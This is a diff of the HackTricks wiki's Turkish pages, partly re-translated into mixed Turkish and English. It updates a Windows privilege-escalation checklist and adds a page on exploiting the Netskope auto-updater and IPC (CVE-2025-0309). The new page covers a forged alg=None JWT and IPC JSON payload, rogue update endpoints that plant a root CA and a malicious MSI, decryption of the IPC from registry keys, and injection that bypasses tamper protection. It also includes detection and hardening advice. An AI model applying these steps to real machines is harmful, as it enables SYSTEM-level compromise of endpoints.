Translated ['src/windows-hardening/windows-local-privilege-escalation/RE

src/SUMMARY.md

@@ -236,6 +236,7 @@
 - [Authentication Credentials Uac And Efs](windows-hardening/authentication-credentials-uac-and-efs.md)
 - [Checklist - Local Windows Privilege Escalation](windows-hardening/checklist-windows-privilege-escalation.md)
 - [Windows Local Privilege Escalation](windows-hardening/windows-local-privilege-escalation/README.md)
+  - [Abusing Auto Updaters And Ipc](windows-hardening/windows-local-privilege-escalation/abusing-auto-updaters-and-ipc.md)
   - [Arbitrary Kernel Rw Token Theft](windows-hardening/windows-local-privilege-escalation/arbitrary-kernel-rw-token-theft.md)
   - [Dll Hijacking](windows-hardening/windows-local-privilege-escalation/dll-hijacking.md)
   - [Abusing Tokens](windows-hardening/windows-local-privilege-escalation/privilege-escalation-abusing-tokens.md)

src/windows-hardening/checklist-windows-privilege-escalation.md

@@ -1,114 +1,115 @@
-# Kontrol Listesi - Yerel Windows Yetki Yükseltme
+# Kontrol Listesi - Local Windows Privilege Escalation
 
 {{#include ../banners/hacktricks-training.md}}
 
-### **Windows yerel yetki yükseltme vektörlerini aramak için en iyi araç:** [**WinPEAS**](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/winPEAS)
+### **Best tool to look for Windows local privilege escalation vectors:** [**WinPEAS**](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/winPEAS)
 
-### [Sistem Bilgisi](windows-local-privilege-escalation/index.html#system-info)
+### [System Info](windows-local-privilege-escalation/index.html#system-info)
 
-- [ ] [**Sistem bilgilerini**](windows-local-privilege-escalation/index.html#system-info) elde et
+- [ ] Elde edin [**System information**](windows-local-privilege-escalation/index.html#system-info)
-- [ ] **kernel** için **saldırılar** [**scriptler kullanarak**](windows-local-privilege-escalation/index.html#version-exploits) ara
+- [ ] Ara **kernel** [**exploits using scripts**](windows-local-privilege-escalation/index.html#version-exploits)
-- [ ] **Google kullanarak** kernel **saldırılarını** ara
+- [ ] **Google to search** ile kernel **exploits** için ara
-- [ ] **searchsploit kullanarak** kernel **saldırılarını** ara
+- [ ] **searchsploit to search** ile kernel **exploits** için ara
-- [ ] [**env vars**](windows-local-privilege-escalation/index.html#environment) içinde ilginç bilgiler var mı?
+- [ ] [**env vars**](windows-local-privilege-escalation/index.html#environment) içinde ilginç bilgi var mı?
-- [ ] [**PowerShell geçmişinde**](windows-local-privilege-escalation/index.html#powershell-history) şifreler var mı?
+- [ ] [**PowerShell history**](windows-local-privilege-escalation/index.html#powershell-history) içinde parolalar var mı?
-- [ ] [**Internet ayarlarında**](windows-local-privilege-escalation/index.html#internet-settings) ilginç bilgiler var mı?
+- [ ] [**Internet settings**](windows-local-privilege-escalation/index.html#internet-settings) içinde ilginç bilgi var mı?
-- [ ] [**Sürücüler**](windows-local-privilege-escalation/index.html#drives)?
+- [ ] [**Drives**](windows-local-privilege-escalation/index.html#drives)?
-- [ ] [**WSUS saldırısı**](windows-local-privilege-escalation/index.html#wsus)?
+- [ ] [**WSUS exploit**](windows-local-privilege-escalation/index.html#wsus)?
+- [ ] [**Third-party agent auto-updaters / IPC abuse**](windows-local-privilege-escalation/abusing-auto-updaters-and-ipc.md)
 - [ ] [**AlwaysInstallElevated**](windows-local-privilege-escalation/index.html#alwaysinstallelevated)?
 
-### [Günlükleme/AV sayımı](windows-local-privilege-escalation/index.html#enumeration)
+### [Logging/AV enumeration](windows-local-privilege-escalation/index.html#enumeration)
 
-- [ ] [**Denetim**](windows-local-privilege-escalation/index.html#audit-settings) ve [**WEF**](windows-local-privilege-escalation/index.html#wef) ayarlarını kontrol et
+- [ ] Kontrol edin [**Audit** ](windows-local-privilege-escalation/index.html#audit-settings) ve [**WEF** ](windows-local-privilege-escalation/index.html#wef) ayarlarını
-- [ ] [**LAPS**](windows-local-privilege-escalation/index.html#laps) kontrol et
+- [ ] Kontrol edin [**LAPS**](windows-local-privilege-escalation/index.html#laps)
-- [ ] [**WDigest**](windows-local-privilege-escalation/index.html#wdigest) aktif mi kontrol et
+- [ ] [**WDigest** ](windows-local-privilege-escalation/index.html#wdigest) aktif mi kontrol edin
-- [ ] [**LSA Koruması**](windows-local-privilege-escalation/index.html#lsa-protection)?
+- [ ] [**LSA Protection**](windows-local-privilege-escalation/index.html#lsa-protection)?
-- [ ] [**Kimlik Bilgileri Koruması**](windows-local-privilege-escalation/index.html#credentials-guard)[?](windows-local-privilege-escalation/index.html#cached-credentials)
+- [ ] [**Credentials Guard**](windows-local-privilege-escalation/index.html#credentials-guard)[?](windows-local-privilege-escalation/index.html#cached-credentials)
-- [ ] [**Önbelleklenmiş Kimlik Bilgileri**](windows-local-privilege-escalation/index.html#cached-credentials)?
+- [ ] [**Cached Credentials**](windows-local-privilege-escalation/index.html#cached-credentials)?
-- [ ] Herhangi bir [**AV**](https://github.com/carlospolop/hacktricks/blob/master/windows-hardening/windows-av-bypass/README.md) kontrol et
+- [ ] Herhangi bir [**AV**](https://github.com/carlospolop/hacktricks/blob/master/windows-hardening/windows-av-bypass/README.md) kontrol edin
-- [ ] [**AppLocker Politikası**](https://github.com/carlospolop/hacktricks/blob/master/windows-hardening/authentication-credentials-uac-and-efs/README.md#applocker-policy)?
+- [ ] [**AppLocker Policy**](https://github.com/carlospolop/hacktricks/blob/master/windows-hardening/authentication-credentials-uac-and-efs/README.md#applocker-policy)?
-- [ ] [**UAC**](https://github.com/carlospolop/hacktricks/blob/master/windows-hardening/authentication-credentials-uac-and-efs/uac-user-account-control/README.md)
+- [ ] [**UAC**](https://github.com/carlospolop/hacktricks/blob/master/windows-hardening/authentication-credentials-uac-and-efs/uac-user-account-control/README.md) kontrol edin
-- [ ] [**Kullanıcı Yetkileri**](windows-local-privilege-escalation/index.html#users-and-groups)
+- [ ] [**User Privileges**](windows-local-privilege-escalation/index.html#users-and-groups)
-- [ ] [**mevcut** kullanıcı **yetkilerini**](windows-local-privilege-escalation/index.html#users-and-groups) kontrol et
+- [ ] Mevcut kullanıcı [**privileges**](windows-local-privilege-escalation/index.html#users-and-groups) kontrol edin
-- [ ] [**herhangi bir ayrıcalıklı grubun**](windows-local-privilege-escalation/index.html#privileged-groups) üyesi misin?
+- [ ] Herhangi bir [**member of any privileged group**](windows-local-privilege-escalation/index.html#privileged-groups) misiniz?
-- [ ] [**bu tokenlerden herhangibiri**](windows-local-privilege-escalation/index.html#token-manipulation) etkin mi: **SeImpersonatePrivilege, SeAssignPrimaryPrivilege, SeTcbPrivilege, SeBackupPrivilege, SeRestorePrivilege, SeCreateTokenPrivilege, SeLoadDriverPrivilege, SeTakeOwnershipPrivilege, SeDebugPrivilege** ?
+- [ ] Aşağıdaki token'lara sahip misiniz kontrol edin (enabled): **SeImpersonatePrivilege, SeAssignPrimaryPrivilege, SeTcbPrivilege, SeBackupPrivilege, SeRestorePrivilege, SeCreateTokenPrivilege, SeLoadDriverPrivilege, SeTakeOwnershipPrivilege, SeDebugPrivilege** ?
-- [ ] [**Kullanıcı Oturumları**](windows-local-privilege-escalation/index.html#logged-users-sessions)?
+- [ ] [**Users Sessions**](windows-local-privilege-escalation/index.html#logged-users-sessions)?
-- [ ] [**kullanıcı evlerini**](windows-local-privilege-escalation/index.html#home-folders) kontrol et (erişim?)
+- [ ] [**users homes**](windows-local-privilege-escalation/index.html#home-folders) kontrol edin (erişim?)
-- [ ] [**Şifre Politikası**](windows-local-privilege-escalation/index.html#password-policy) kontrol et
+- [ ] [**Password Policy**](windows-local-privilege-escalation/index.html#password-policy) kontrol edin
-- [ ] [**Panoya**](windows-local-privilege-escalation/index.html#get-the-content-of-the-clipboard) ne var?
+- [ ] [**inside the Clipboard**](windows-local-privilege-escalation/index.html#get-the-content-of-the-clipboard) içinde ne var?
 
-### [Ağ](windows-local-privilege-escalation/index.html#network)
+### [Network](windows-local-privilege-escalation/index.html#network)
 
-- [ ] **mevcut** [**ağ** **bilgilerini**](windows-local-privilege-escalation/index.html#network) kontrol et
+- [ ] Mevcut [**network information**](windows-local-privilege-escalation/index.html#network) kontrol edin
-- [ ] Dışarıya kısıtlı **gizli yerel hizmetleri** kontrol et
+- [ ] Dışa kapalı gizli local servisleri kontrol edin
 
-### [Çalışan Süreçler](windows-local-privilege-escalation/index.html#running-processes)
+### [Running Processes](windows-local-privilege-escalation/index.html#running-processes)
 
-- [ ] Süreçlerin ikili [**dosya ve klasör izinleri**](windows-local-privilege-escalation/index.html#file-and-folder-permissions)
+- [ ] Process binary'lerinin [**file and folders permissions**](windows-local-privilege-escalation/index.html#file-and-folder-permissions) izinlerini kontrol edin
-- [ ] [**Bellek Şifre madenciliği**](windows-local-privilege-escalation/index.html#memory-password-mining)
+- [ ] [**Memory Password mining**](windows-local-privilege-escalation/index.html#memory-password-mining)
-- [ ] [**Güvensiz GUI uygulamaları**](windows-local-privilege-escalation/index.html#insecure-gui-apps)
+- [ ] [**Insecure GUI apps**](windows-local-privilege-escalation/index.html#insecure-gui-apps)
-- [ ] `ProcDump.exe` aracılığıyla **ilginç süreçlerle** kimlik bilgilerini çal? (firefox, chrome, vb...)
+- [ ] İlginç process'lerle **ProcDump.exe** kullanarak kimlik bilgilerini çalın? (firefox, chrome, vb.)
 
-### [Hizmetler](windows-local-privilege-escalation/index.html#services)
+### [Services](windows-local-privilege-escalation/index.html#services)
 
-- [ ] [Herhangi bir **hizmeti değiştirebilir misin**?](windows-local-privilege-escalation/index.html#permissions)
+- [ ] Herhangi bir service'yi **değiştirebilir** misiniz? (modify) (permissions) [Can you **modify any service**?](windows-local-privilege-escalation/index.html#permissions)
-- [ ] [Herhangi bir **hizmet** tarafından **çalıştırılan** **ikiliyi** **değiştirebilir misin**?](windows-local-privilege-escalation/index.html#modify-service-binary-path)
+- [ ] Herhangi bir service tarafından **çalıştırılan binary'yi** **değiştirebilir** misiniz? [Can you **modify** the **binary** that is **executed** by any **service**?](windows-local-privilege-escalation/index.html#modify-service-binary-path)
-- [ ] [Herhangi bir **hizmetin** **kayıt defterini** **değiştirebilir misin**?](windows-local-privilege-escalation/index.html#services-registry-modify-permissions)
+- [ ] Herhangi bir service'in **registry**'sini **değiştirebilir** misiniz? [Can you **modify** the **registry** of any **service**?](windows-local-privilege-escalation/index.html#services-registry-modify-permissions)
-- [ ] [Herhangi bir **belirtilmemiş hizmet** ikili **yolu** üzerinden avantaj sağlayabilir misin?](windows-local-privilege-escalation/index.html#unquoted-service-paths)
+- [ ] Herhangi bir **unquoted service** binary **path**'inden yararlanabilir misiniz? [Can you take advantage of any **unquoted service** binary **path**?](windows-local-privilege-escalation/index.html#unquoted-service-paths)
 
-### [**Uygulamalar**](windows-local-privilege-escalation/index.html#applications)
+### [**Applications**](windows-local-privilege-escalation/index.html#applications)
 
-- [ ] **Yüklenmiş uygulamalar üzerindeki** [**yazma**](windows-local-privilege-escalation/index.html#write-permissions) izinleri
+- [ ] Yüklü uygulamalarda **write** [**permissions on installed applications**](windows-local-privilege-escalation/index.html#write-permissions)
-- [ ] [**Başlangıç Uygulamaları**](windows-local-privilege-escalation/index.html#run-at-startup)
+- [ ] [**Startup Applications**](windows-local-privilege-escalation/index.html#run-at-startup)
-- [ ] **Zayıf** [**Sürücüler**](windows-local-privilege-escalation/index.html#drivers)
+- [ ] **Vulnerable** [**Drivers**](windows-local-privilege-escalation/index.html#drivers)
 
 ### [DLL Hijacking](windows-local-privilege-escalation/index.html#path-dll-hijacking)
 
-- [ ] **PATH içindeki herhangi bir klasöre yazabilir misin**?
+- [ ] PATH içindeki herhangi bir klasöre **yazabilir** misiniz?
-- [ ] **yüklenmeye çalışan** herhangi bir bilinen hizmet ikilisi var mı **mevcut olmayan DLL**?
+- [ ] Hiçbir servisin bilinen ve **olmayan** bir DLL'i yüklemeye çalıştığı biliniyor mu?
-- [ ] **herhangi bir** ikili klasöre **yazabilir misin**?
+- [ ] Herhangi bir **binaries folder** içine **yazabilir** misiniz?
 
-### [Ağ](windows-local-privilege-escalation/index.html#network)
+### [Network](windows-local-privilege-escalation/index.html#network)
 
-- [ ] Ağı say (paylaşımlar, arayüzler, yollar, komşular, ...)
+- [ ] Ağı enumerate edin (shares, interfaces, routes, neighbours, ...)
-- [ ] localhost (127.0.0.1) üzerinde dinleyen ağ hizmetlerine özel bir göz at
+- [ ] Localhost (127.0.0.1) üzerinde dinleyen network servislerine özellikle bakın
 
-### [Windows Kimlik Bilgileri](windows-local-privilege-escalation/index.html#windows-credentials)
+### [Windows Credentials](windows-local-privilege-escalation/index.html#windows-credentials)
 
 - [ ] [**Winlogon** ](windows-local-privilege-escalation/index.html#winlogon-credentials) kimlik bilgileri
-- [ ] [**Windows Vault**](windows-local-privilege-escalation/index.html#credentials-manager-windows-vault) kullanabileceğin kimlik bilgileri var mı?
+- [ ] [**Windows Vault**](windows-local-privilege-escalation/index.html#credentials-manager-windows-vault) kullanabileceğiniz kimlik bilgileri var mı?
-- [ ] İlginç [**DPAPI kimlik bilgileri**](windows-local-privilege-escalation/index.html#dpapi)?
+- [ ] İlginç [**DPAPI credentials**](windows-local-privilege-escalation/index.html#dpapi)?
-- [ ] Kaydedilmiş [**Wifi ağlarının**](windows-local-privilege-escalation/index.html#wifi) şifreleri?
+- [ ] Kaydedilmiş [**Wifi networks**](windows-local-privilege-escalation/index.html#wifi) parolaları?
-- [ ] [**kaydedilmiş RDP Bağlantılarında**](windows-local-privilege-escalation/index.html#saved-rdp-connections) ilginç bilgiler var mı?
+- [ ] [**saved RDP Connections**](windows-local-privilege-escalation/index.html#saved-rdp-connections) içinde ilginç bilgi?
-- [ ] [**son çalıştırılan komutlarda**](windows-local-privilege-escalation/index.html#recently-run-commands) şifreler var mı?
+- [ ] [**recently run commands**](windows-local-privilege-escalation/index.html#recently-run-commands) içinde parolalar var mı?
-- [ ] [**Uzak Masaüstü Kimlik Bilgileri Yöneticisi**](windows-local-privilege-escalation/index.html#remote-desktop-credential-manager) şifreleri?
+- [ ] [**Remote Desktop Credentials Manager**](windows-local-privilege-escalation/index.html#remote-desktop-credential-manager) parolaları?
-- [ ] [**AppCmd.exe** mevcut mı](windows-local-privilege-escalation/index.html#appcmd-exe)? Kimlik bilgileri?
+- [ ] [**AppCmd.exe** exists](windows-local-privilege-escalation/index.html#appcmd-exe)? Kimlik bilgileri?
-- [ ] [**SCClient.exe**](windows-local-privilege-escalation/index.html#scclient-sccm)? DLL Yan Yükleme?
+- [ ] [**SCClient.exe**](windows-local-privilege-escalation/index.html#scclient-sccm)? DLL Side Loading?
 
-### [Dosyalar ve Kayıt Defteri (Kimlik Bilgileri)](windows-local-privilege-escalation/index.html#files-and-registry-credentials)
+### [Files and Registry (Credentials)](windows-local-privilege-escalation/index.html#files-and-registry-credentials)
 
-- [ ] **Putty:** [**Kimlik Bilgileri**](windows-local-privilege-escalation/index.html#putty-creds) **ve** [**SSH anahtarları**](windows-local-privilege-escalation/index.html#putty-ssh-host-keys)
+- [ ] **Putty:** [**Creds**](windows-local-privilege-escalation/index.html#putty-creds) **and** [**SSH host keys**](windows-local-privilege-escalation/index.html#putty-ssh-host-keys)
-- [ ] [**Kayıt defterinde SSH anahtarları**](windows-local-privilege-escalation/index.html#ssh-keys-in-registry)?
+- [ ] [**SSH keys in registry**](windows-local-privilege-escalation/index.html#ssh-keys-in-registry)?
-- [ ] [**denetimsiz dosyalarda**](windows-local-privilege-escalation/index.html#unattended-files) şifreler var mı?
+- [ ] [**unattended files**](windows-local-privilege-escalation/index.html#unattended-files) içinde parolalar?
 - [ ] Herhangi bir [**SAM & SYSTEM**](windows-local-privilege-escalation/index.html#sam-and-system-backups) yedeği var mı?
-- [ ] [**Bulut kimlik bilgileri**](windows-local-privilege-escalation/index.html#cloud-credentials)?
+- [ ] [**Cloud credentials**](windows-local-privilege-escalation/index.html#cloud-credentials)?
 - [ ] [**McAfee SiteList.xml**](windows-local-privilege-escalation/index.html#mcafee-sitelist.xml) dosyası?
-- [ ] [**Önbelleklenmiş GPP Şifresi**](windows-local-privilege-escalation/index.html#cached-gpp-pasword)?
+- [ ] [**Cached GPP Password**](windows-local-privilege-escalation/index.html#cached-gpp-pasword)?
-- [ ] [**IIS Web yapılandırma dosyasında**](windows-local-privilege-escalation/index.html#iis-web-config) şifre var mı?
+- [ ] [**IIS Web config file**](windows-local-privilege-escalation/index.html#iis-web-config) içindeki parola?
-- [ ] [**web** **günlüklerinde**](windows-local-privilege-escalation/index.html#logs) ilginç bilgiler var mı?
+- [ ] [**web logs**](windows-local-privilege-escalation/index.html#logs) içinde ilginç bilgi?
-- [ ] Kullanıcıdan [**kimlik bilgilerini istemek**](windows-local-privilege-escalation/index.html#ask-for-credentials) ister misin?
+- [ ] Kullanıcıdan [**ask for credentials**](windows-local-privilege-escalation/index.html#ask-for-credentials) ister misiniz?
-- [ ] [**Geri Dönüşüm Kutusu içindeki**](windows-local-privilege-escalation/index.html#credentials-in-the-recyclebin) ilginç dosyalar var mı?
+- [ ] [**Recycle Bin**](windows-local-privilege-escalation/index.html#credentials-in-the-recyclebin) içindeki ilginç dosyalar?
-- [ ] [**kimlik bilgileri içeren diğer**](windows-local-privilege-escalation/index.html#inside-the-registry) kayıt defterleri var mı?
+- [ ] Diğer [**registry containing credentials**](windows-local-privilege-escalation/index.html#inside-the-registry)
-- [ ] [**Tarayıcı verileri içinde**](windows-local-privilege-escalation/index.html#browsers-history) (dbs, geçmiş, yer imleri, ...)?
+- [ ] [**Browser data**](windows-local-privilege-escalation/index.html#browsers-history) içinde (dbs, history, bookmarks, ...)?
-- [ ] Dosyalar ve kayıt defterinde [**genel şifre araması**](windows-local-privilege-escalation/index.html#generic-password-search-in-files-and-registry)
+- [ ] Dosya ve registry'de [**Generic password search**](windows-local-privilege-escalation/index.html#generic-password-search-in-files-and-registry)
-- [ ] Şifreleri otomatik olarak aramak için [**Araçlar**](windows-local-privilege-escalation/index.html#tools-that-search-for-passwords)
+- [ ] Parola aramak için [**Tools**](windows-local-privilege-escalation/index.html#tools-that-search-for-passwords)
 
-### [Sızdırılan İşleyiciler](windows-local-privilege-escalation/index.html#leaked-handlers)
+### [Leaked Handlers](windows-local-privilege-escalation/index.html#leaked-handlers)
 
-- [ ] Yönetici tarafından çalıştırılan bir sürecin herhangi bir işleyicisine erişimin var mı?
+- [ ] Yönetici tarafından çalıştırılan bir process'in herhangi bir handler'ına erişiminiz var mı?
 
-### [Pipe İstemci Taklit Etme](windows-local-privilege-escalation/index.html#named-pipe-client-impersonation)
+### [Pipe Client Impersonation](windows-local-privilege-escalation/index.html#named-pipe-client-impersonation)
 
-- [ ] Bunu kötüye kullanıp kullanamayacağını kontrol et
+- [ ] Kötüye kullanıp kullanamayacağınızı kontrol edin
 
 {{#include ../banners/hacktricks-training.md}}

src/windows-hardening/windows-local-privilege-escalation/abusing-auto-updaters-and-ipc.md

@@ -0,0 +1,123 @@
+# Abusing Enterprise Auto-Updaters and Privileged IPC (e.g., Netskope stAgentSvc)
+
+{{#include ../../banners/hacktricks-training.md}}
+
+Bu sayfa, düşük sürtünmeli bir IPC yüzeyi ve ayrıcalıklı bir update akışı açığa çıkaran kurumsal endpoint agentları ve updateler içinde bulunan Windows local privilege escalation zincirleri sınıfını genelleştirir. Temsilî bir örnek, düşük ayrıcalıklı bir kullanıcının enrollment'ı bir saldırgan kontrolündeki sunucuya zorlayabildiği ve ardından SYSTEM servisinin kurduğu kötü amaçlı bir MSI teslim edebildiği Netskope Client for Windows < R129 (CVE-2025-0309)′dır.
+
+Yeniden kullanabileceğiniz ana fikirler:
+- Bir privileged servisinin localhost IPC'sini, re‑enrollment veya yeniden yapılandırmayı saldırgan sunucuya zorlamak için kötüye kullanın.
+- Vendor’ın update endpointlerini implemente edin, rogue Trusted Root CA teslim edin ve updater'ı kötü amaçlı, “signed” pakete yönlendirin.
+- Zayıf signer kontrollerinden (CN allow‑lists), opsiyonel digest flag'lerden ve gevşek MSI properties'den kaçının.
+- IPC “encrypted” ise, registry'de saklanan world‑readable makine tanımlayıcılarından key/IV türetin.
+- Servis çağıranları image path/process name ile sınırlandırıyorsa, allow‑listed bir process'e inject edin veya bir tane suspended olarak spawn edip DLL'inizi minimal bir thread‑context patch ile bootstrap edin.
+
+---
+## 1) Forcing enrollment to an attacker server via localhost IPC
+
+Birçok agent, SYSTEM servisine localhost TCP üzerinden JSON konuşan bir user‑mode UI process ile gelir.
+
+Netskope'de gözlemlendi:
+- UI: stAgentUI (low integrity) ↔ Service: stAgentSvc (SYSTEM)
+- IPC command ID 148: IDP_USER_PROVISIONING_WITH_TOKEN
+
+Exploit flow:
+1) Backend host'u (ör. AddonUrl) kontrol eden claim'lere sahip bir JWT enrollment token'ı craft edin. Alg olarak alg=None kullanın, böylece imza gerekmez.
+2) JWT ve tenant adı ile provisioning komutunu çağıran IPC mesajını gönderin:
+```json
+{
+"148": {
+"idpTokenValue": "<JWT with AddonUrl=attacker-host; header alg=None>",
+"tenantName": "TestOrg"
+}
+}
+```
+3) Servis, enrollment/config için sahte sunucunuza istek göndermeye başlar, ör.:
+- /v1/externalhost?service=enrollment
+- /config/user/getbrandingbyemail
+
+Notlar:
+- Eğer caller verification path/name‑based ise, isteği allow‑listed vendor binary'den başlatın (see §4).
+
+---
+## 2) Hijacking the update channel to run code as SYSTEM
+
+İstemci sunucunuzla iletişim kurduktan sonra, beklenen endpoint'leri uygulayın ve onu saldırgan MSI'ye yönlendirin. Tipik sıra:
+
+1) /v2/config/org/clientconfig → Çok kısa bir güncelleme aralığı içeren JSON konfigürasyonu döndürün, örn.:
+```json
+{
+"clientUpdate": { "updateIntervalInMin": 1 },
+"check_msi_digest": false
+}
+```
+2) /config/ca/cert → Bir PEM CA sertifikası döndürür. Servis bunu Local Machine Trusted Root store into yükler.
+3) /v2/checkupdate → Zararlı bir MSI'ya ve sahte bir sürüme işaret eden metadata sağlar.
+
+Bypassing common checks seen in the wild:
+- Signer CN allow‑list: servis sadece Subject CN'nin “netSkope Inc” veya “Netskope, Inc.” olup olmadığını kontrol ediyor olabilir. Sizin sahte CA'nız bu CN ile bir leaf verebilir ve MSI'yı imzalayabilir.
+- CERT_DIGEST property: CERT_DIGEST adlı zararsız bir MSI özelliği ekleyin. Kurulum sırasında uygulanmıyor.
+- Optional digest enforcement: config flag (ör. check_msi_digest=false) ekstra kriptografik doğrulamayı devre dışı bırakır.
+
+Sonuç: SYSTEM servisi MSI'nızı
+C:\ProgramData\Netskope\stAgent\data\*.msi
+konumundan kurar ve NT AUTHORITY\SYSTEM olarak rastgele kod çalıştırır.
+
+---
+## 3) Forging encrypted IPC requests (when present)
+
+R127'den itibaren, Netskope IPC JSON'u Base64 benzeri görünen encryptData alanına sarmıştı. Tersine mühendislik AES ve anahtar/IV'in herhangi bir kullanıcı tarafından okunabilen registry değerlerinden türetildiğini gösterdi:
+- Key = HKLM\SOFTWARE\NetSkope\Provisioning\nsdeviceidnew
+- IV  = HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProductID
+
+Saldırganlar şifrelemeyi yeniden üretebilir ve standart bir kullanıcıdan geçerli şifreli komutlar gönderebilir. Genel ipucu: bir agent aniden IPC'sini “şifreliyorsa”, HKLM altında device ID'ler, product GUID'leri, install ID'ler gibi materyallere bakın.
+
+---
+## 4) Bypassing IPC caller allow‑lists (path/name checks)
+
+Bazı servisler TCP bağlantısının PID'sini çözerek eş tarafı authenticate etmeye çalışır ve image path/name'i Program Files altında bulunan izinli vendor ikili dosyalarla (ör. stagentui.exe, bwansvc.exe, epdlp.exe) karşılaştırır.
+
+İki pratik bypass:
+- izinli bir süreçe (ör. nsdiag.exe) DLL injection yapıp IPC'yi içinden proxy'leyin.
+- izinli bir ikiliyi suspended olarak spawn edin ve CreateRemoteThread kullanmadan proxy DLL'inizi bootstrap ederek driver‑enforced tamper kurallarını sağlayın (bkz §5).
+
+---
+## 5) Tamper‑protection friendly injection: suspended process + NtContinue patch
+
+Ürünler genelde protected süreçlere ait handle'lardan tehlikeli hakları temizlemek için bir minifilter/OB callbacks driver ile gelir (ör. Stadrv):
+- Process: PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_READ, PROCESS_DUP_HANDLE, PROCESS_SUSPEND_RESUME haklarını kaldırır
+- Thread: THREAD_GET_CONTEXT, THREAD_QUERY_LIMITED_INFORMATION, THREAD_RESUME, SYNCHRONIZE ile sınırlı tutar
+
+Bu kısıtlamalara saygı gösteren güvenilir bir user‑mode loader:
+1) Vendor ikili dosyasını CREATE_SUSPENDED ile CreateProcess edin.
+2) Hâlâ almanıza izin verilen handle'ları edinin: process için PROCESS_VM_WRITE | PROCESS_VM_OPERATION ve bir thread handle'ı için THREAD_GET_CONTEXT/THREAD_SET_CONTEXT (veya bilinen bir RIP'te kodu patchliyorsanız sadece THREAD_RESUME).
+3) ntdll!NtContinue (veya başka erken, garantiyle map edilmiş thunk) üzerine küçük bir stub yazın; bu stub DLL yolunuzda LoadLibraryW çağırıp sonra geri zıplasın.
+4) ResumeThread ile stub'unuzun in‑process tetiklenmesini sağlayın ve DLL'inizi yükleyin.
+
+Zaten korunmuş bir süreç üzerinde PROCESS_CREATE_THREAD veya PROCESS_SUSPEND_RESUME kullanmadığınız için (süreci siz oluşturdunuz), driver politikası sağlanmış olur.
+
+---
+## 6) Practical tooling
+- NachoVPN (Netskope plugin) sahte CA, zararlı MSI imzalama sürecini otomatikleştirir ve gerekli endpoint'leri sunar: /v2/config/org/clientconfig, /config/ca/cert, /v2/checkupdate.
+- UpSkope, isteğe bağlı olarak AES‑şifreli olabilen rastgele IPC mesajları üreten ve izinli bir ikili üzerinden kökenlenmesi için suspended‑process injection içeren özel bir IPC client/exploit'tir.
+
+---
+## 7) Detection opportunities (blue team)
+- Local Machine Trusted Root'a eklemeleri izleyin. Sysmon + registry‑mod eventing (bkz SpecterOps guidance) iyi çalışır.
+- Ajan servisi tarafından C:\ProgramData\<vendor>\<agent>\data\*.msi gibi yollarından başlatılan MSI çalıştırmalarını işaretleyin.
+- Beklenmeyen enrollment host/tenant'lar için ajan loglarını inceleyin, örn: C:\ProgramData\netskope\stagent\logs\nsdebuglog.log – addonUrl / tenant anomalilerine ve provisioning msg 148'e bakın.
+- Beklenen imzalı ikililer olmayan veya sıra dışı child process tree'lerinden gelen localhost IPC client'ları için alarm oluşturun.
+
+---
+## Hardening tips for vendors
+- Enrollment/update host'larını sıkı bir allow‑list'e bağlayın; client code içinde güvenilmeyen domainleri reddedin.
+- IPC peer'lerini image path/name kontrolleri yerine OS primitifleriyle authenticate edin (ALPC security, named‑pipe SIDs).
+- Gizli materyalleri world‑readable HKLM'de tutmayın; eğer IPC şifrelenmek zorundaysa anahtarları protected secret'lardan türetin veya authenticated kanallarda müzakere edin.
+- Updater'ı bir supply‑chain yüzeyi olarak değerlendirin: kontrol ettiğiniz güvenilir bir CA'ya tam zincir gerektirin, paket imzalarını pinned key'lere karşı doğrulayın ve config'te doğrulama devre dışıysa kapatın (fail closed).
+
+## References
+- [Advisory – Netskope Client for Windows – Local Privilege Escalation via Rogue Server (CVE-2025-0309)](https://blog.amberwolf.com/blog/2025/august/advisory---netskope-client-for-windows---local-privilege-escalation-via-rogue-server/)
+- [NachoVPN – Netskope plugin](https://github.com/AmberWolfCyber/NachoVPN)
+- [UpSkope – Netskope IPC client/exploit](https://github.com/AmberWolfCyber/UpSkope)
+- [NVD – CVE-2025-0309](https://nvd.nist.gov/vuln/detail/CVE-2025-0309)
+
+{{#include ../../banners/hacktricks-training.md}}